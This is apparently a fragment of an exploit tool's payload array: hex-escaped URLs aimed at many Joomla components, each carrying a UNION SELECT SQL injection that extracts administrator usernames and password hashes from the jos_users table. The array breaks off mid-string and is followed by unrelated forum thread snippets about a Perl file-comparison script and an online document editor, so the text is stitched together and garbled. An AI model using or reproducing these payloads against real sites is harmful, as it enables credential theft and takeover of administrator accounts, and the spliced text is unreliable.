\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x26\x70\x61\x67\x65\x3d\x76\x69\x65\x77\x63\x61\x74\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x30\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x70\x75\x61\x72\x63\x61\x64\x65\x26\x49\x74\x65\x6d\x69\x64\x3d\x39\x32\x26\x66\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x72\x73\x67\x61\x6c\x6c\x65\x72\x79\x26\x70\x61\x67\x65\x3d\x69\x6e\x6c\x69\x6e\x65\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x78\x73\x73\x74\x72\x65\x61\x6d\x2d\x64\x6d\x26\x49\x74\x65\x6d\x69\x64\x3d\x36\x39\x26\x6d\x6f\x76\x69\x65\x3d\x2d\x31\x2f\x2a\x2a\x2f\x75\x6e\x69\x6f\x6e\x2f\x2a\x2a\x2f\x73\x65\x6c\x65\x63\x74\x2f\x2a\x2a\x2f\x31\x2c\x32\x2c\x61\x64\x6d\x69\x6e\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2f\x2a\x2a\x2f\x66\x72\x6f\x6d\x2f\x2a\x2a\x2f\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x62\x69\x62\x6c\x65\x73\x74\x75\x64\x79\x26\x76\x69\x65\x77\x3d\x6d\x65\x64\x69\x61\x70\x6c\x61\x79\x65\x72\x26\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c\x32\x37\x2c\x32\x38\x2c\x32\x39\x2c\x33\x30\x2c\x33\x31\x2c\x33\x32\x2c\x33\x33\x2c\x33\x34\x2c\x33\x35\x2c\x33\x36\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34\x30\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x66\x71\x26\x49\x74\x65\x6d\x69\x64\x3d\x39\x39\x39\x26\x6c\x69\x73\x74\x69\x64\x3d\x39\x39\x39\x2f\x2a\x2a\x2f\x75\x6e\x69\x6f\x6e\x2f\x2a\x2a\x2f\x73\x65\x6c\x65\x63\x74\x2f\x2a\x2a\x2f\x30\x2c\x63\x6f\x6e\x63\x61\x74\x20\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2f\x2a\x2a\x2f\x66\x72\x6f\x6d\x2f\x2a\x2a\x2f\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2f\x2a","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x66\x6f\x6f\x74\x62\x61\x6c\x6c\x26\x74\x61\x73\x6b\x3d\x76\x69\x65\x77\x74\x65\x61\x6d\x26\x74\x65\x61\x6d\x49\x44\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x6e\x75\x6c\x6c\x2c\x6e\x75\x6c\x6c\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x63\x6f\x6e\x63\x61\x74\x20\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x38\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6a\x61\x62\x6f\x64\x65\x26\x74\x61\x73\x6b\x3d\x73\x69\x67\x6e\x26\x73\x69\x67\x6e\x3d\x74\x61\x75\x72\x75\x73\x26\x69\x64\x3d\x2d\x32\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6e\x65\x74\x69\x6e\x76\x6f\x69\x63\x65\x26\x61\x63\x74\x69\x6f\x6e\x3d\x6f\x72\x64\x65\x72\x73\x26\x74\x61\x73\x6b\x3d\x6f\x72\x64\x65\x72\x26\x63\x69\x64\x3d\x2d\x31\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x32\x2c\x33\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c\x32\x37\x2c\x32\x38\x2c\x32\x39\x2c\x33\x30\x2c\x33\x31\x2c\x33\x32\x2c\x33\x33\x2c\x33\x34\x2c\x33\x35\x2c\x33\x36\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x34\x33\x2c\x34\x34\x2c\x34\x35\x2c\x34\x36\x2c\x34\x37\x2c\x34\x38\x20\x46\x52\x4f\x4d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x62\x65\x61\x6d\x6f\x73\x70\x65\x74\x69\x74\x69\x6f\x6e\x26\x70\x65\x74\x3d\x2d\x35\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x70\x72\x61\x79\x65\x72\x63\x65\x6e\x74\x65\x72\x26\x74\x61\x73\x6b\x3d\x76\x69\x65\x77\x5f\x72\x65\x71\x75\x65\x73\x74\x26\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x61\x72\x74\x69\x73\x74\x26\x69\x64\x67\x61\x6c\x65\x72\x79\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x32\x2c\x33\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6a\x6f\x6f\x6d\x72\x61\x64\x69\x6f\x26\x70\x61\x67\x65\x3d\x73\x68\x6f\x77\x5f\x76\x69\x64\x65\x6f\x26\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x65\x71\x75\x6f\x74\x65\x73\x26\x69\x64\x3d\x31\x33\x2b\x61\x6e\x64\x2b\x31\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x69\x64\x6f\x62\x6c\x6f\x67\x26\x74\x61\x73\x6b\x3d\x75\x73\x65\x72\x62\x6c\x6f\x67\x26\x75\x73\x65\x72\x69\x64\x3d\x34\x32\x2b\x61\x6e\x64\x2b\x31\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x65\x61\x73\x79\x62\x6f\x6f\x6b\x26\x49\x74\x65\x6d\x69\x64\x3d\x31\x26\x66\x75\x6e\x63\x3d\x64\x65\x6c\x65\x74\x65\x65\x6e\x74\x72\x79\x26\x67\x62\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\

0
94
Member Avatar for sandeepau

Hello, I'm executing following Perl script program with purpose of comparing two text file & save output in third file with flags. However, the execution process of this Perl script taking too much time for large size input text file. Can someone suggest performance optimization technique for following script. 1. …

0
76
Member Avatar for WolfShield

For those of you unfamiliar with Google Documents, it is like Microsoft Word/Excel/etc. online. I would like to create a simple online document editing program where a logged-in users could edit and save a book or other text-based document. However I do not have a lot of Web Programming experience …

0
75

The End.